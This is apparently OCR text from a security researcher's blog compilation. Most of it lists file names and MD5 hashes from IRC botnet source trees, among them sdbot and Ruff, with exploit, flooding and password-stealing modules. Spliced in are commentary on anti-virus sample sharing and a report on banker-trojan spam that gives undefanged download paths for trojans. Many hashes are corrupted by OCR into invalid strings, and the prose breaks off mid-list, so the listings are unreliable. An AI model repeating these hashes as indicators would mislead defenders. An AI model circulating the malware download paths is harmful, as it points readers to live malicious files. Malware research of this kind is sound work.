autostart.h 
f4fbe0c8b65385e430a777691ff7aace 


11659 


avirus.cpp 
90230d9aef62be4cef439832c0fe54ce 

avirus.h e55a156d28fde56a0bb05fc599dafecf 
CleanUp.bat 
f8cae7al4ebe00275a46349285cc852e 

config.h 4c8a7c1727a567221446fc9a28907309 
credits.txt 
f84f17558bab53748a2c61d5bf0cel9e 
dcom.cpp 64fa33eaa2a9de04bcfl1dd59f20e852 
dcom.h 

b2792e423f3ec732793723d53a0e12c8 
Defines.h 
5d46ab9d5d88870f4e2c4446c162d847 
dns.cpp 

9024084fc54bb1cc479f256427332269 

dns.h 

ab2c466be14b5bdc7926d3e51lae2d10f 
download.cpp 
ac15371ba98b7e270dca3f9be3clbafd 
download.h 
187868409ecd324a855187414b397167 
driveinfo.cpp 
61489a2a37e1c3cdb6990d6b2f5916b4 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 

extern.h 9d7fe19a56362f3a671ed13051fc6a9c 
fphost.cpp 
cb92cla0cdada8afd7b92bdbb8650885 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp dc08e7206529f1db44355837bf18d326 
ftpd.h 

48a891506c957340b207b627105d7bb4 
functions.h 
baef36d4baf239dfd7d04b8971e7c438 
hostauth.cpp 
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b55c6c608ab00008ec2c003c00353f90 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
icmpflood.cpp 
70fc604da1812fca684b701a4e500222 
icmpflood.h 
4462c6318220648820316848deb124fd 
identd.cpp 
flad766874468961407ae58418b1e900 


identd.h d59ab0522f735c3d29ffd032870e522f 


Includes.h 
d5362e672af2a66e20b84a17cc3ac39c 
irc send.cpp 
76ec2b840db2701d00d0f75675555a8e 
irc send.h 
65e70187da5c1166002c32a86a808194 
loaddll.cpp 
e6b0cc2638b8dcec4b263bd3521bd253 
loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 


misc.cpp 01613e25c0223581028459f71800974a 


misc.h 
ea5b8eb52a7124b69d2ccfb4e1319df7 
ms04 007 asnl.cpp 
cfd058dc4946496af0ec2f67c4b0081¢c 
ms04 _007 _asnl.h 
c18cb0ec17923a63653974cbfb1ldlecb 
MS05-039-pp.cpp 
ce5e4dae6ff8dd6501e53b5910f235bb 
MS05-039-pp.h 
fb00215a5203334c8b7cdc26a9ec16ab 
net.cpp 
9c383b2d4e6517a85ce84d3c69ef4e39 
net.h 
Obcae316c7ad0e800dd1758880a25acf 
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netheaders.h 
dce3ff7f1b3f5e902e6a7485d174c287 
netutils.cpp 
7ce06dda762d5706fce5eea2e38c55bf 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
passwd.h 76459e9d8a479f2ef8ca2al1a6737f580 
processes.cpp 
b66c0665216dc2288bcf8fff01786931 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
rndnick.cpp 
6109d6a65fcd9388cefae9c67d5f3e6e 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
sasser.cpp 
2e63f3d24f38d3b3bf5201ff2e11e500 
sasser.h f285bc67448b03f9d54a4ed5e62c58ea 
scan.cpp bc960d7eb12a521c33b321173a7fbd3b 
scan.h 

sdbot05b.cpp 
4fe76e6648fc325ecefo633a22c75fcf 
sdbot05b.dsp 
50416065ce0efaf647d480e7c1298ac4 
sdbot05b.dsw 
11ac2f28922917d1f0ae90ea17f13241 
sdbot05b.h 
c81bdbc19e13c93fce3230bab69f6f83b 
sdbot05b.ncb 
43ba9b0e0a3c23462838d052f4ebd122 
sdbot05b.opt 
305cafebd3a2776fae9e83821a0fbd90 
sdbot05b.plg 
ade8a0151fe560c28f7b7fle25abdd19 


secure.cpp 
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with malware, and has never been. Another important issue that deserves to be discussed 
is the issue with the [4]virus outbreak time of different vendors in [5]Stormy Wormy times 
for instance. In the past, vendors were even using their detection in the wild, and on-the-fly 
binary obfuscation which in times of [6]open source malware results in [7]countless number of 
variants. Good PR is vital, and so is gaining competitive advatange in the minds of prospective 
customers by positioning the company among the first to have responded to the outbreak, 
but it raises the issue on the degree of exchanging malware samples between the vendors 
themselves, and the lack of transparency here. The way initiatives in the form of honeyfarms 
contributing hundreds of malware samples, and "wisdom of crowds" end users filling the gaps 
in reactive response indirectly protect millions of customers on behalf of anti virus software, 
in this very same way exchanging malware samples in the shortest possible time frame, 
ultimately benefits each and every customer and organization that’s having an anti virus in 
its perimeter defense strategy. 


A non-profit honeyfarm can collect hundreds of thousands of undetected malware sam- 
ples in a single month, let’s speculate that it could even outperform a small AV vendor’s 
malware aggregation capabilities. In the anti virus industry, branding is crucial and therefore 
the non-profit honeyfarm cannot enter the market, instead, it’s only incentive to donate 
the samples to the anti virus vendors is that of social responsibility. AVs should build more 
awareness on the importance of malware samples sharing among them, compared to pitching 
themselves as the vendor who first picked up the outbreak and protected its customers. 
Bargaining with someone’s upcoming infection isn’t that much of a success if you think about 
it. "Hey that signature is mine" days should have been over by now. 


Moreover, it’s a basic principle of every competitive market that the more competition, 
the more choices the customer would have, thereby making vendors innovate or cease to 
exist in irrelevance. Does the same apply to the anti virus market? Can we have a built-to-flip 
honeyfarm into an anti virus vendor to be later on acquired and integrated within a com- 
pany’s existing products portfolio? Let’s hope not, and it’s doubtful as there’s a difference 
between an anti virus software and an “anti virus software", at least from the perspective 
that the second “anti virus software" may be occupying markets that could have otherwise 
been served by a better market proposition. Product development of an AV courtesy of a 
security vendor’s products portfolio given the vendor realized that a huge percentage of 
security spending goes to perimeter defense solutions can be tricky, and even if acquisition 
has taken place you’d better stick to a company whose core competency is anti virus solutions. 


[8]Still Living in the Perimeter Defense World? 


1 
2 

3. 

4. 

a: 

. 

7. 
8. 


ttp://ddanchev. blogspot .com/2006/08/malware-bot-families-technology-and.htm 


ttp://ddanchev.blogspot.com/2007/01/still-living-in-perimeter-defense-world. htm 
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821dc62739e2cee603fdeb342cea92ee 
secure.h 91d9c721labbf6c860b7f59b7580e8451 
shellcode.cpp 
007902c34ed313a34c47397e84fdc434 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
sniffer.cpp 
d65cf47372e789930ff139dd9b459635 
sniffer.h 
5eebe93de4e03bf0bb118e35997743a9 
socks.cpp 
adcb2d40f1bd49d73e6b15b6ce4c69dd 
socks.h 
b103f307ff02cd98fe2bfbecbd19c011 
synflood.cpp 
142e1970540de2d63ac5dda8188208ae 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
taskhider.cpp 
177cd3592dbc89c7676d4e7b7a5921F4 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
f1980d02582ebdffcd77fld4ee3522fd 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.cpp 
3e4e79fce663cf7ab6e67f8f3de90acla 
threads.h 
71d97ecb2fb1129abe3ffd979193dlaf 
visit.cpp 
9eb5e0e50f7a87c7d8d1c85cc32adc4e 


visit.h 
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5ffab31leb3db2a5c000bd789b4f46025 

wks.CPP 
f80204343e3c8d84907dea8b7c27b919 

wks.h 

8elcebeaeb/ba43ede346b20f0d50c40 
wkssvc.cpp 
2f94152a20ca8cfc16f6laa5dbca2ad3 

wkssvc.h 40cbf340990988e1214bc77e02d2ad93 
advscan.cpp 
05416dc69aedd2ea44d049c2e311091d 
advscan.h 
b94c5220a79a787f3568326166d96d86 
aliaslog.cpp 
d60195a5148165141d045628f82671e1 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.cpp 
09e282ede5d3f5cb74fdc1l1f42a4aaaa 
autostart.h 
f4fbe0c8b65385e430a777691ff7aace 
avirus.cpp 
clfaa26772295159473766a79d65fd20 

avirus.h e55a156d28fde56a0bb05fc599dafecf 
cdkeys.cpp 
6cefd533cc83fflcb2e2641df11f7118 

cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
CleanUp.bat 
f8cae7al4ebe00275a46349285cc852e 

config.h 02094e5dfbe5be6be6aa945cb70e320b 
dcom.cpp ccl6f207fb070f45d696a61ac6767fes8 
dcom.h 

9dO0c31dla4aacb69f45f9de51617e50b 
Defines.h 
b96aa6272f682c4bd288bd447bbb6e77 
dns.cpp 
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9024084fc54bb1cc479f256427332269 
dns.h 
ab2c466be14b5bdc7926d3e51ae2d10f 
download.cpp 
821d4c239e07cbc3517b924125624ae8 
download.h 
187868409ecd324a855187414b397167 
driveinfo.cpp 
f037664dcb8b1acb338006048b8dfbc5 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
extern.h Of5ef9e6d8eab44f584de5ea3cd2b03f 
findpass.cpp 
62b37acecdf39dce18e0cd1bf7cf4c67 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
cb92cla0cdada8afd7b92bdbb8650885 
fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp dc08e7206529f1db44355837bf18d326 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
c8fal4db2e5c39f5e254c1466db4c2d1 
hide.cpp O2bba04d3a0c7a6c386c6040b0899db1 
hider.cpp 
0204bf4d4ca06025306ceb30371a1702 
hostauth.cpp 
b55c6c608ab00008ec2c003c00353f90 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
httpd.cpp 
a3e77470f9c5daeba521a95ca0743f3e 
httpd.h 
288553599c70aa95ec2119d78938578a 
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identd.cpp 
flad766874468961407ae58418b1e900 
identd.h d59ab0522f735c3d29ffd032870e522f 
Includes.h 
f8363b8db2f46195604519339dc6b5e3 

irc send.cpp 
4ac164b5ad219ded78b428aaf0f10e69 

irc _send.h 
65e70187da5c1166002c32a86a808194 
loaddll.cpp 
e6b0cc2638b8dcec4b263bd3521bd253 
loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 
misc.cpp 01613e25c0223581028459f71800974a 
misc.h 

ea5b8eb52a7124b69d2ccfb4e1319df7 

ms04 007 asnl.cpp 
97ea0c4852c44f3333404e2f52d7a884 

ms04 _007 _asnl.h 
7197f300fb96d9e53dba194602069d2d 

net.cpp 
9c383b2d4e6517a85ce84d3c69ef4e39 

net.h 

Obcae316c7ad0e800dd1758880a25acf 
netapi.cpp 
016acbdd6237f438162610c29d441056 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netheaders.h 
dce3ff7flb3f5e902e6a7485d174c287 
netutils.cpp 
ce8c4f3b78bbc2827f3a31e7bef78b63 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
passwd.h eb13a5006e35fad4d998aef9b64ad45b 


processes.cpp 
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5e93bfc72130bcacd974cc2069b9a914 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
rndnick.cpp 
fd6bd05f136b6c6192b08e09455942dc 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
scan.cpp bc960d7eb12a521c33b321173a/7fbd3b 
scan.h 

sdbot05b.cpp 
24ddd650187682195740d09ed962f902 
sdbot05b.dsp 

77 4aabf75c9c28b29b0cb7bdc7923dfa 
sdbot05b.dsw 
11lac2f28922917d1f0ae90ea17f13241 
sdbot05b.h 
cb481ff702316b57848228695b0d45be 
sdbot05b.ncb 
e6aa763e33293a95c7e59d37c62a1487 
sdbot05b.opt 
184401c0b62235b097e0b7692f6f8cc7 
sdbot05b.plg 
40f10baf83654acfc64156d64b7268d9 
secure.cpp 
821dc62739e2cee603fdeb342cea92ee 
secure.h 91d9c721labbf6c860b7f59b7580e8451 
shellcode.cpp 
007902c34ed313a34c47397e84fdc434 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks.cpp 
11535c573b2c1a624f493cd338dc402f 
socks.h 
b103f307ff02cd98fe2bfbecbd19c011 
sym06 _010.cpp 
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6e2c68a211a9812d8ba7ba5f3c64e186 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 

f1980d02582ebdffcd7 7fld4ee3522fd 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.cpp 
3e4e79fce663cf7a6e67f8f3de90acla 
threads.h 
71d97ecb2fb1129abe3ffd979193d1laf 
vnc.cpp 
78e27d3cf9083926e22a254151c02089 
vnc.h 
d0fa5b5c8cd4b072674231481e8e53ee 
vncrooter.cpp 
8925960b34ba93b82e91ba985f3380de 
vncrooter.h 
091d289ad5beebf2b717054dc8dea837 
advscan.cpp 
fc3263145749deac7e2b6064519ba558 
advscan.h 
2589adb7d502f93c0d7d6724c7d81039 
aliaslog.cpp 
d60195a5148165141d045628f82671e1 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.cpp 
09e282ede5d3f5cb74fdc1l1f42a4aaaa 
autostart.h 
f4fbe0c8b65385e430a777691ff7aace 
avirus.cpp 
90230d9aef62be4cef439832c0fe54ce 
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avirus.h e55a156d28fde56a0bb05fc599dafecf 
config.h 324717b5al3f23bac9ab8ac31lac8decc 
dcom.cpp 64fa33eaa2a9de04bcfl1dd59f20e852 
dcom.h 

b2792e423f3ec732793723d53a0e12c8 
Defines.h 
6ae1532b45d10ce20e821fd69497b65c 
dns.cpp 

9024084fc54bb1cc479f256427332269 

dns.h 

ab2c466be14b5bdc7926d3e51ae2d10f 
download.cpp 
ac15371ba98b7e270dca3f9be3clbafd 
download.h 
187868409ecd324a855187414b397167 
driveinfo.cpp 
61489a2a37e1c3cdb6990d6b2f5916b4 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 

extern.h 70f27e8c3747f5da79c608cae2a94429 
fphost.cpp 
cb92cla0cdada8afd7b92bdbb8650885 
fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp dc08e7206529f1db44355837bf18d326 
ftpd.h 

48a891506c957340b207b627105d7bb4 
functions.h 
baef36d4baf239dfd7d04b8971e7c438 
hostauth.cpp 
b55c6c608ab00008ec2c003c00353f90 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
httpd.cpp 
a3e77470f9c5daeba521a95ca0743f3e 

httpd.h 
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288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
70fc604da1812fca684b701a4e500222 
icmpflood.h 
4462c6318220648820316848deb124fd 
identd.cpp 
flad766874468961407ae58418b1e900 
identd.h d59ab0522f735c3d29ffd032870e522f 
Includes.h 
78a62c721625b798a7cfe7dd45c7d8e4 
irc send.cpp 
76ec2b840db2701d00d0f75675555a8e 
irc _send.h 
65e70187da5c1166002c32a86a808194 
loaddll.cpp 
e6b0cc2638b8dcec4b263bd3521bd253 
loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 
misc.cpp 01613e25c0223581028459f71800974a 
misc.h 
ea5b8eb52a7124b69d2ccfb4e1319df7 
ms04 007 asnl.cpp 
2a853c9d10336d329d45043a0ff4ccle 
ms04 _007 _asnl.h 
9ba0297d16535978fa6341a6633b7e35 
net.cpp 
9c383b2d4e6517a85ce84d3c69ef4e39 
net.h 
Obcae316c7ad0e800dd1758880a25acf 
netapi.cpp 
0c6064856095ed180049c816c7d60063 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netheaders.h 
dce3ff7flb3f5e902e6a7485d174c287 
netutils.cpp 
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7ce06dda762d5706fce5eea2e38c55bf 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
passwd.h 76459e9d8a479f2ef8ca2al1a6737f580 
processes.cpp 
b66c0665216dc2288bcf8fff01786931 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
rndnick.cpp 
fd6bd05f136b6c6192b08e09455942dc 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
scan.cpp bc960d7eb12a521c33b321173a/7fbd3b 
scan.h 

sdbot05b.cpp 
a27d0fd77927d22951e273459599061c 
sdbot05b.dsp 
€3051b2536163fee923162ef32846d40 
sdbot05b.dsw 
11lac2f28922917d1f0ae90ea17f13241 
sdbot05b.h 
c81bdbc19e13c93fce3230bab69f6f83b 
sdbot05b.ncb 
66f089b55369e7e94582e85ca2ac7efd 
sdbot05b.opt 
4a1147ba31b0504b5f0fa55f5f0d5f5c 
secure.cpp 
821dc62739e2cee603fdeb342cea92ee 
secure.h 91d9c721labbf6c860b7f59b7580e8451 
shellcode.cpp 
007902c34ed313a34c47397e84fdc434 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
sniffer.cpp 
d65cf47372e789930ff139dd9b459635 
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sniffer.h 
5eebe93de4e03bf0bb118e35997743a9 
socks.cpp 
adcb2d40f1bd49d73e6b15b6ce4c69dd 
socks.h 
b103f307ff02cd98fe2bfbecbd19c011 
synflood.cpp 
142e1970540de2d63ac5dda8188208ae 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
taskhider.cpp 
177cd3592dbc89c7676d4e7b7a5921F4 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 

f1980d02582ebdffcd7 7fld4ee3522fd 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.cpp 
3e4e79fce663cf7a6e67f8f3de90acla 
threads.h 
71d97ecb2fb1129abe3ffd979193d1laf 
visit.cpp 
9eb5e0e50f7a87c7d8d1c85cc32adc4e 
visit.h 
5ffab31leb3db2a5c000bd789b4f46025 
vnc.cpp 
73a90cb08432538a4440cda8efb7 96ff 
vnc.h 
76734009998943bb064222c5c3b4c59e 
CleanUp.bat 
9741c163502f68563bd7208206ecc348 
Ruff.dsp 3e302623b3a85e44818b5211817311d1 
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3.11.11 Targeted Spamming of Bankers Malware (2007-11-12 13:22) 


Assunto: |Chegou 1 vivo foto torpedo. 
Remetente:||targedo@coolsms.com.br 


MSG: 
@yahoo.com.br 
@terra.com.br 
MAILS: @omail.com 


@uol.com.br 
@isbt.com.br 


Informacdes; 31337 


This particular incident is interesting mostly because we have a good example that [l]once a 
site gets compromised the potential for abusing the access for malware distribution becomes 
very realistic, this is in fact what happened with autobroker.com.pl, as the following URLs 
were active as of yesterday, now down due to notification. Basically, the compromised host, 
compromised in an [2]automatic and efficient way for sure, started acting as the foundation 
for the campaign, which as it looks like was spammed in a targetted manner. A tiny php file 
at autobroker.com.pl/I.php was launching the downloader : 


[3]TROJ.BANLOAD 

Result: 18/31 (58.07 %) 

File size: 46080 bytes 

MD5: 690e71077c9d78347368c6cf8752741e 

SHA1: 7dedad0778a24c69d6df4c8ceedc94f20292473e 


the downloader then drops the following bankers that are strangely hosted on the French site 
[4]Opus Citatum, and are still active : 


opuscitatum.com/modules/PHP %20Files/ __steampw12318897 _.exe 


Trojan-Spy.Win32.Banker.ciy 

Result: 9/32 (28.13 %) 

File size: 2498560 bytes 

MD5: ceelfdea650487e0865a1b8831dble73 

SHA1: ad55ff3e5519d88b930d6a0a695e71fcc253351le 


opuscitatum.com/modules/PHP %20Files/Ivete Sangalo.scr 
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Ruff.dsw 6702c9728b02eac0825dcefe6d7 3f60f 
advscan.cpp 
9cf4504f878bb25949bd7e82840d6d48 
aliaslog.cpp 
ac9b3c65e2ca5880738d4f80262c19b4 
autostart.cpp 
a072289807c00347f2d29b12dc39593b 
avirus.cpp 
4f1a0e103b0f249a429bb37a700d8d4b 
crc32.cpp 
1357bb3b875dd17bdd8d3dbd20c62b19 
crypt.cpp 
eebO0a8cab6d208bdd7d8f542f66fc77a 
dcc.cpp 
cbfc2fdac38ea6b0353e25ab5d42b2a8 
download.cpp 
7deec89267ef83a87c6e6b082ca367f6 
driveinfo.cpp 
9f76e€67725099533c0ae4841fef6777f 
ehandler.cpp 
be4d5b1881362f85fa2666a4b29bfded 
fphost.cpp 
19eb7efc6aa31c01e7c4a9615e6e22c0 
ftpd.cpp 9cb3796117187ae716ce5b0a1e400551 
httpd.cpp 
1119dbd941dffa2ad805f4da878678a0 
ident.cpp 
0a6176b8975c171c98ac68f73ea3b6bb 
irc send.cpp 
€14416233afc52e48578de8ba2b9368e 
loaddlls.cpp 
03060b8e6c57030d465f09dcb21097cc 
massasn.cpp 
c5f9dcb0832d703d8b5e6c042c1d41le7 
misc.cpp 1771cddd7bbb0052d0ce6c15049e066f 
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ms04 007 asnl.cpp 
9375458da857d4e6340f93790f9aab23 
net.cpp 
29fe97aaald90fe317ff5c73b34ed6b4 
netutils.cpp 
1d3ea9ee111a6a9136ba42fe69c64cea 
processes.cpp 
e€1738a490ffc2e502036093fcc7 8e3df 
random.cpp 
7073dbc83bc983bbbbf15668944a2684 
remotecmd.cpp 
5118d2f289cO01lbblaeed2a0973bc7991 
rlogind.cpp 
57f0ff5be3ad8ff27749ec49aa711fcb 
rndnick.cpp 
98943d028112196d80217a44dbb8112f 
Ruff.cpp 3880f6c8dc3ed111e95be5e0d1fa0ele 
scan.cpp 8b67a7115653466a9af58a8al1f779617b 
secure.cpp 
117d4d59cda957070b8a012d06ddc199 
session.cpp 
47dc46d058526cdeedb261a64b7a7101 
shellcode.cpp 
a0342d2efd788d1081a6020ee1b18fd8 
socks4.cpp 
99e38f7c089d735d233a890c0d1282b8 
sysinfo.cpp 
80fc32a0474f4bd306a6a890475c5489 
tftpd.cpp 
20c778cb10ea6c66a1469ed6403d784e 
threads.cpp 
566c4751c53acd0718473bdedf749e75 
veritas.cpp 
1¢c3a9ab54693f851092620eb72f49e92 
visit.cpp 
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4ce152334ca9d2eee3930cffe3905ac6 
wildcard.cpp 
340178d366c6ee79ce31e7Cc9a26835e7 
configs.h 
912ffe280b1lbafad851le3ad48aceda42 
advscan.h 
ef14bfaal0257dc989f57fb467ef38e0 
aliaslog.h 
9e14e395003fa8fdde410bc39ee517de 
autostart.h 
6461e7f75d17f0349765b1653ed3cd55 


avirus.h 2c4499b6bf793b9d89219592ac7bad39 


crc32.h 
8307e0fddc042b67cc59e69c9116bbe0 
crypt.h 
444dc9930aee78144c1009f83462af0b 
dcc.h 
3fcc2120e0a8583alab7da025d458aeb 
defines.h 
fa043b2e6d96e56b4d3fdbcf5c1308ad 
download.h 
5e4bc39c1a2a6679bb0792dd6918f025 
driveinfo.h 
0b27e3621884233b69dc89536a9c3c15 
ehandler.h 
5abeldf92190c740e225522782738ada 
externs.h 
0d6e84c43e953dba06ef589dccf7e514 


fphost.h 653477026c3bb9991fa2245f9f44fdef 


ftpd.h 
8082dae2c236f6078e05cd6d8af1cf49 


ftppot.h cef91c81b916af0a892b7144f338bb3F 


functions.h 
1c46750dc10dbcb81d004e28e4265e42 
globals.h 
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574760e04f58a3c92c1f3d4898092f8a 
httpd.h 
743e9el1be4d1f853dabc21e81c594890 
ident.h 
6577f56a343fb0992fdd5246916496c5 
includes.h 
27663e9498b16e5a90ba13926222fbdc 
irc _send.h 
ad9066771f87de477d0c048c05482fce 
loaddlls.h 
e9aec6b745ca7df4bd5b71a02b2967ef 
massasn.h 
9218d5e2b737c35a45d79a7d3907658a 
misc.h 
55bf22f43bbd690d4b7616f96163164e 
ms04 007 _asnl.h 
32f84330ea3890cdbbfa930d056cbba2 
net.cpp 
9b513c0d64174d04f88700e91a42cdec 
net.h 
5cfd3bcc14c21d1403ebff3c3e331152 
netutils.h 
108c6464220a70628da5c0e92641dfa9 
nicklist.h 
3b5ca620b18ece66360e6decb443fe82 
passwd.h c0a400fb2a76f8d336d0718cc36a72ea 
processes.h 
7006311c2996ef4800b9a7853eacc8df 
random.h 5d4c28e6ebf3cce49837c14a1a4a64f6 
remotecmd.h 
2bec406e59edce4127860f9be41549d4 
resource.h 
1c1f270cff1f6810011552a92d170737 
rlogind.h 
3ea4cOba86d00c84f98a9f6ad0d46d90 
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rndnick.h 
810142d9331dadb84b348blaac71lea75 
Ruff.h 
c4ca5f4b2049168b767cdf571badcc4b 
scan.h 
c8ac42414bf133b143101bcacc434749 
secure.h €8062863ae01791c35a684449b554300 
session.h 
07c726751e47fa72e41e1ea2e6225a85 
shellcode.h 
22104b30ecb509d6646cbb15e35dcd4c 
socks4.h b06f0e3c923df590687ea6594a3d313b 
sysinfo.h 
c280a666fd618c80d344a6dda44afl ff 
tcpip.h 
15ee2c9a40e8cce353c2a8af5fab 7ff3 
tftpd.h 
O3bfbddc441a728c86b8dc57a27df760 
threads.h 
b3e8027198760423578ce90b21ee1a20 
veritas.h 
e9e974838f1e71f88120ede9d5fffab4 
visit. 
9ec7b7a62ff12c34401ace9756a50f13 
wildcard.h 
33d622a8aa9a465dc4f140394f4c5f73 
README.TXT 
5d6c323203b0525b2b6f24f9aebb9deb 
kcounterx.ICO 
a621f4fa65629344732ddc19f321997a 
recource.rc 
f52b186d75ee8e8f13cff1764840c93b 
advscan.cpp 
d5d7cf56e09558fd86al4db494bf0d36 


advscan.h 
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47250702c804cca7305c35b985287517 
aliaslog.cpp 
e57fe93e071535560a6f27d3d3010662 
aliaslog.h 
48d113ef65ed247ac717d285b8ca6da6 
autostart.cpp 
13329a3fd3974d4cada1699d76e4d001 
autostart.h 
d633db695b9352ac3b9d2c9e49c4ddb3 
avirus.cpp 
11c6f4a3485ac12901181b3d17799619 
avirus.h a14828f26c61c3dac7fd62769b03443a 
CleanUp.bat 
d313b8c4c90f71b18e6e6d597bf54188 
configs.h 
0a5d50b66340d8ddd4f76db2ca482ab6 
crc32.cpp 
2e526b97alcdaa4ca7e1f99764cfd800 
crc32.h 
40d778dd0c3e677bdc947b450d645040 
crypt.cpp 
c2ab02a4e6aa531be5d17f82df9d7f04 
crypt.h 
94cf8bdfd3ebac5deed772dc1a5482b8 
dcc.cpp 
0d87baf7c79f776301b57643d0af8db4 
dcc.h 
b02e212c4fa387f8c636a6e586add440 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
1896b57c023ae68ecf44b1e46e03e820 
download.cpp 
543216af810adf7e8a5198ca77f50821 
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download.h 
e56eab84ec5ef786fd5d3dedc887bebb 
driveinfo.cpp 
710621e9d484605ff8e86bd1e3791e28 
driveinfo.h 
dfce6aal1f76a846382b59608ddd95913 
ehandler.cpp 
fedba0ebabf46e728f9b61a53b5fc4f3 
ehandler.h 
41f132e6d546f4d37fd0563aa7ae389a 
externs.h 
2dc271a0a609ce2a36d7eb4563cb84ef 
findfile.cpp 
342bfb372b919bcce25ec4e35b6d94a4 
findfile.h 
ea10657590098411cd035895ee589e6d 
findpass.cpp 
9bbf412cde2e485f87472d93713f5545 
findpass.h 
dd88750e4804ee6ab6bed32aa4720cd5 
fphost.cpp 
e565e16d40629f73c4bffaa045a6d851 


fphost.h f9bce1c269b636b88a11d089119b1847 
ftpd.cpp 92d6d529b386a8c064130bd2f68cb49f 


ftpd.h 
6d68ed40730d11a6754d88e637856d54 
functions.h 
59e6e3f68c215e77b06f641c7d9c7104 
globals.h 
45dbd0fa8999248ac80615c32199aa7a 
httpd.cpp 
081d5870a2059277762d5dee86cf89el 
httpd.h 
6f944ed7a027f812037f82571802b3c4 
ident.cpp 


11679 


d44bdb067c2b87ab05ale112dd92b60a 
ident.h 
f9ebfedfcf82a07f0dc07e6a3c9a5ch6 
includes.h 
639043a2f5952d3b1e84fc894b6ecc43 
irc send.cpp 
2ea3314614cc0ee7a0fd39fda4lee53a 
irc _send.h 
ea862ef9c9314576991e5c8ede0ca795 
loaddlls.cpp 
7046222429b54d46ac014b7edec162af 
loaddlls.h 
65ce88234be047bdb75df881b76a21ad 
misc.cpp 3e301bce794972dd8cc18af97aa4b010 
misc.h 
5cf93932a954aféd0ffaea67e47dbc9a 
ms04 007 asnl.cpp 
68e06b3ddef507d60f6baf148913f9a7 
ms04 007 _asnl.h 
32f84330ea3890cdbbfa930d056cbba2 
net.cpp 
16c95a093306df4b756a5af9d040189a 
net.h 
c6ee28eb922a6b5f037f6de9dac3bf5f 
netbios.cpp 
bb17840f3dd290c5923c2ad4bc51c93d 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
f16842c5fb4481e77e898a74390302d8 
netutils.h 
fdb3542433bd1835786694366d05ae24 
nicklist.h 
78f508a6d49bfa8d2bac45b5869ae252 


passwd.h ldda2a85a6a9f84fe5be96032e19b2b1 
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pnp.cpp 

4f37ef02a31c1b2a71fc41e06624914d 

pnp.h 

a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
f01f11a23793c24e9ae5e5bd2ace35el1 
processes.h 
75d3a2e5b4c60102c4d1137235845af0 
ProtX.ico 
4a43125e9e37241319b22eaa5421a0dd 
random.cpp 
998f6d203c7a0d73fb81e7da364005b5 
random.h 681177bf5b9dla6de4ea9b6b75d2e691 
recource.rc 
78c409eb72214e8e4c5cb48a0086554d 
remotecmd.cpp 
b86784710722d6631943c9d0fef556e2 
remotecmd.h 
8f0bfcd5cf226ccb5b3b42e9fe9392ee 
rlogind.cpp 
d87020bb5520b444e5a8ca91leee7f972 
rlogind.h 
00fad45253997ce226b2e1108326968a 
rndnick.cpp 
d801b94a46d9271802f014fbaa3cec44 
rndnick.h 

6b3aeed93db47 7fd1c632e0fc4e17ces 

ruff.cop a09ae609cbd3105850ed4c0e65elbec9 
ruff.dsp 447d03cc0O66eaa6e2bd6e6e3fde3d2a9 
ruff.dsw abbf049da74700dc1f07250818ad5cd1 
ruff.h 

7eea8d728afc70099b2585ab6ef82970b 

ruff.ncb 2a3f3de6287fa839110c1525beba7989 
ruff.opt a4d5fe092d7c64f1lb761a326b65bab94 
ruff.plg 6ebdf15a86c89158903af949fcf4b885 
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scan.cpp 99033483dd03a356c91f9d360014f859 
scan.h 
5e707a00bfb3a06albde92467b410875 
secure.cpp 
52fdd75f82fe3289779eaebffole5aa3 
secure.h ec43eaccd583e4917760029ef0485803 
session.cpp 
e€67508d262e532dcb34974714883cbec 
session.h 
d0698e9f174ff465f22f5faf384978b5 
shellcode.cpp 
3aac7431685900b9cd178bfbdf2b0fba 
shellcode.h 
48196aa5ef87af3c34802c83bd1e5091 
socks4.cpp 
